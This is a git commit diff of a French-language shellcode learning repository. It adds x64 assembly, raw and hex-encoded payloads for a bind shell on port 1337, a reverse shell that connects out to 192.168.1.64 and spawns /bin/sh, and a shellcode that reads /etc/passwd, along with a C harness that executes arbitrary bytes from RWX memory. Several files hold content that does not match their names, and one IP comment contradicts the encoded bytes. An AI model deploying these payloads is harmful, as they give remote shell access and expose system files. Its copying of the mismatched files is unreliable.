Ajout des premiers shellcodes sur x86 / x64

Author: voydstack

README.md

@@ -1 +1,11 @@
-# shellcoding
+J'uploaderai sur ce repo différents shellcodes que j'ai pu faire pendant mon apprentissage.
+
+Pour l'instants ces architectures sont disponibles, j'en rajouterai d'autre avec le temps.
+
+* x86
+* x64
+
+Enjoy :)
+
+PS: Si vous avez des questions ou des remarques sur ces shellcodes n'hésitez pas à me PM sur twitter [@voydstack](twitter.com/voydstack).
+

executor.c

@@ -0,0 +1,28 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <unistd.h>
+
+#define SHELLCODE_SIZE 0x1000
+
+int main(int argc, char *argv[]) {
+	void (*shellcode)();
+
+	shellcode = mmap(NULL, SHELLCODE_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANON, -1, 0);
+
+	if(shellcode == MAP_FAILED) {
+		perror("[-] mmap");
+		exit(1);
+	}
+
+	if(argc == 1) {
+		read(0, shellcode, SHELLCODE_SIZE);
+	} else if(argc == 2) {
+		strncpy((char *) shellcode, argv[1], SHELLCODE_SIZE - 1);
+	}
+
+	shellcode();
+
+	return 0;
+}

shellconvert.py

@@ -0,0 +1,18 @@
+#!/usr/bin/python
+
+import sys
+
+def convert(shellcode_bin):
+	shellcode_str = ""
+	for c in shellcode_bin:
+		shellcode_str += "\\x%02x" % ord(c)
+	return shellcode_str
+
+if __name__ == "__main__":
+	if len(sys.argv) != 2:
+		print("Usage: %s <shellcode file>" % sys.argv[1])
+	try:
+		with open(sys.argv[1], "rb") as shellcode_file:
+			print convert(shellcode_file.read())
+	except:
+		print("Error while opening file")

x64/README.md

@@ -0,0 +1,47 @@
+# Shellcodes x64
+
+Voici une collection de shellcodes pour x64, pour l'instant ceux-là sont disponibles j'en rajouterai sûrement à l'avenir.
+
+### **exit(0) (10 octets)**
+
+Sort du programme en cours d'exécution avec 0 en code de retour.
+
+### **Hello, World (46 octets)**
+
+Affiche "Hello, World !\n" puis quitte le programme.
+
+### **/bin/sh (28 octets)**
+
+Ouvre un shell sans fixer les permissions.
+
+### **setreuid /bin/sh (42 octets)**
+
+Ouvre un shell en fixant les permissions avec setreuid(1000, 1000).
+
+### **bindshell (111 octets)**
+
+Attache un shell au port 1337.
+
+### **reverse shell (100 octets)**
+
+Se connecte en retour à l'adresse 192.168.1.64 au port 1337.
+
+### **read /etc/passwd (73 octets)**
+
+Lit un fichier (dans ce cas là /etc/passwd) et affiche son contenu sur stdout.
+
+## Modifier et assembler un shellcode
+
+Pour modifier les shellcodes présents ici, par exemple pour changer le numéro de port, il suffit de faire la modification directement dans le code du shellcode, puis de l'assembler avec la commande:
+
+```sh
+nasm -f bin shellcode.asm -o shellcode.bin
+```
+
+Pour le tester, on peut utiliser le programme executor64 qui va mapper une zone mémoire exécutable puis l'exécuter avec notre shellcode à l'intérieur.
+
+```sh
+cat shellcode.bin | ./executor64
+# Ou encore
+./executor64 "$(cat shellcode.bin)"
+```

x64/bind-shell/bind-shell.asm

@@ -0,0 +1,76 @@
+bits 64
+section .text
+global _start
+
+_start:
+	
+	; socket(AF_INET, SOCK_STREAM, 0)
+	; (2, 1, 0)
+
+	xor rax, rax
+	mov rdx, rax
+	mov al, 41
+	mov rsi, rdx
+	inc rsi
+	mov rdi, rsi
+	inc rdi
+
+	syscall
+
+	mov r8, rax
+
+	; bind(sockfd, &saddr, 0x10)
+	
+	mov rdi, r8
+	mov al, 49
+	push rdx
+	push rdx
+	mov byte [rsp], 0x2
+	mov word [rsp+2], 0x3905
+	mov rsi, rsp
+	mov dl, 0x10
+
+	syscall
+
+	; listen(sockfd, 0x10)
+
+	mov al, 50
+	mov rsi, rdx
+
+	syscall
+
+	; accept(sockfd, NULL, NULL)
+	
+	mov al, 43
+	xor rsi, rsi
+	xor rdx, rdx
+
+	syscall
+
+	mov r9, rax
+
+	; dup2(clientfd, [0,1,2])
+
+	mov rdi, r9
+	duplicate:
+		mov al, 33
+		syscall
+		inc sil
+		cmp sil, 0x2
+		jle duplicate
+
+	; execve("/bin/sh", NULL, NULL)
+	
+	jmp binsh
+
+	shell:
+	mov al, 0x3b
+	xor rsi, rsi
+	xor rdx, rdx
+	pop rdi
+
+	syscall
+
+	binsh:
+		call shell
+		db "/bin/sh"

x64/bind-shell/bind-shell.bin

@@ -0,0 +1 @@
+H1�H�°)H��H��H��H��I��L�ǰ1RR�$f�D$9H���2H���+H1�H1�I��L�ϰ!@��@��~���;H1�H1�_�����/bin/sh

x64/bind-shell/bind-shell.hex

@@ -0,0 +1 @@
+\x48\x31\xc0\x48\x89\xc2\xb0\x29\x48\x89\xd6\x48\xff\xc6\x48\x89\xf7\x48\xff\xc7\x0f\x05\x49\x89\xc0\x4c\x89\xc7\xb0\x31\x52\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x05\x39\x48\x89\xe6\xb2\x10\x0f\x05\xb0\x32\x48\x89\xd6\x0f\x05\xb0\x2b\x48\x31\xf6\x48\x31\xd2\x0f\x05\x49\x89\xc1\x4c\x89\xcf\xb0\x21\x0f\x05\x40\xfe\xc6\x40\x80\xfe\x02\x7e\xf3\xeb\x0b\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x5f\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68

x64/executor64

@@ -0,0 +1,11 @@
+bits 64
+section .text
+global _start
+
+_start:
+	; exit(0)
+	xor rax, rax
+	mov al, 0x3c
+	xor rdi, rdi
+	
+	syscall

x64/exit/exit.asm

@@ -0,0 +1 @@
+H1��<H1�

x64/exit/exit.bin

@@ -0,0 +1 @@
+\x48\x31\xc0\xb0\x3c\x48\x31\xff\x0f\x05

x64/exit/exit.hex

@@ -0,0 +1,30 @@
+bits 64
+section .text
+global _start
+
+_start:
+	jmp getstring
+
+	hello:
+	
+	; write(1, "Hello, World !\n", 0x10)
+	
+	xor rax, rax
+	inc rax
+	mov rdi, rax
+	pop rsi
+	xor rdx, rdx
+	mov dl, 0x10
+
+	syscall
+
+	; exit(0)
+	
+	mov al, 60
+	dec rdi
+
+	syscall 
+
+	getstring:
+		call hello
+		db "Hello, World !", 0xa

x64/hello/hello.asm

@@ -0,0 +1 @@
+�H1�H��H��^H1Ҳ�<H�������Hello, World !

x64/hello/hello.bin

@@ -0,0 +1 @@
+\xeb\x18\x48\x31\xc0\x48\xff\xc0\x48\x89\xc7\x5e\x48\x31\xd2\xb2\x10\x0f\x05\xb0\x3c\x48\xff\xcf\x0f\x05\xe8\xe3\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x20\x57\x6f\x72\x6c\x64\x20\x21\x0a

x64/hello/hello.hex

@@ -0,0 +1,51 @@
+bits 64
+section .text
+global _start
+
+_start:
+
+	jmp filename
+
+	; open("/etc/passwd", O_RDONLY)
+	open:
+	
+	xor rax, rax
+	xor rsi, rsi
+	mov al, 2
+	pop rdi
+
+	syscall
+
+	mov rdi, rax
+
+	; read(filefd, buf, 0x1337)
+
+	xor rax, rax
+	xor rdx, rdx
+	mov dx, 0x1337
+	sub sp, dx
+	mov rsi, rsp
+
+	syscall
+
+	; write(stdout, buf, len(buf))
+
+	mov rdx, rax
+	xor rax, rax
+	mov al, 1
+	mov rdi, rax
+
+	syscall
+
+	; exit(0)
+
+	xor rax, rax
+	mov al, 60
+	xor rdi, rdi
+
+	syscall
+
+
+	filename:
+		call open
+		db "/etc/passwd"

x64/readfile/readfile.asm

@@ -0,0 +1 @@
+�7H1�H1��_H��H1�H1�f�7f)�H��H��H1��
H��H1��<H1������/etc/passwd

x64/readfile/readfile.bin

@@ -0,0 +1 @@
+\xeb\x37\x48\x31\xc0\x48\x31\xf6\xb0\x02\x5f\x0f\x05\x48\x89\xc7\x48\x31\xc0\x48\x31\xd2\x66\xba\x37\x13\x66\x29\xd4\x48\x89\xe6\x0f\x05\x48\x89\xc2\x48\x31\xc0\xb0\x01\x48\x89\xc7\x0f\x05\x48\x31\xc0\xb0\x3c\x48\x31\xff\x0f\x05\xe8\xc4\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64

x64/readfile/readfile.hex

@@ -0,0 +1,59 @@
+bits 64
+section .text
+global _start
+
+_start:
+	
+	; socket(AF_INET, SOCK_STREAM, 0)
+	; (2, 1, 0)
+
+	xor rax, rax
+	mov rdx, rax
+	mov al, 41
+	mov rsi, rdx
+	inc rsi
+	mov rdi, rsi
+	inc rdi
+
+	syscall
+
+
+	; connect(sockfd, &saddr, 0x10)
+	
+	mov rdi, rax
+	mov al, 42
+	push rdx
+	push rdx
+	mov byte [rsp], 0x2
+	mov word [rsp + 2], 0x3905 ; 1337
+	mov dword [rsp + 4], 0x4001a8c0 ; 192.168.1.40
+	mov rsi, rsp
+	mov dl, 0x10
+
+	syscall
+
+	; dup2(clientfd, [0,1,2])
+	
+	xor rsi, rsi
+	duplicate:
+		mov al, 33
+		syscall
+		inc sil
+		cmp sil, 0x2
+		jle duplicate
+
+	; execve("/bin/sh", NULL, NULL)
+	
+	jmp binsh
+
+	shell:
+	mov al, 0x3b
+	xor rsi, rsi
+	xor rdx, rdx
+	pop rdi
+
+	syscall
+
+	binsh:
+		call shell
+		db "/bin/sh"

x64/reverse-shell/reverse-shell.asm

@@ -0,0 +1 @@
+H1�H�°)H��H��H��H��H�ǰ*RR�$f�D$9�D$��
@H��H1��!@��@��~���;H1�H1�_�����/bin/sh

x64/reverse-shell/reverse-shell.bin

@@ -0,0 +1 @@
+\x48\x31\xc0\x48\x89\xc2\xb0\x29\x48\x89\xd6\x48\xff\xc6\x48\x89\xf7\x48\xff\xc7\x0f\x05\x48\x89\xc7\xb0\x2a\x52\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x05\x39\xc7\x44\x24\x04\xc0\xa8\x01\x40\x48\x89\xe6\xb2\x10\x0f\x05\x48\x31\xf6\xb0\x21\x0f\x05\x40\xfe\xc6\x40\x80\xfe\x02\x7e\xf3\xeb\x0b\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x5f\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68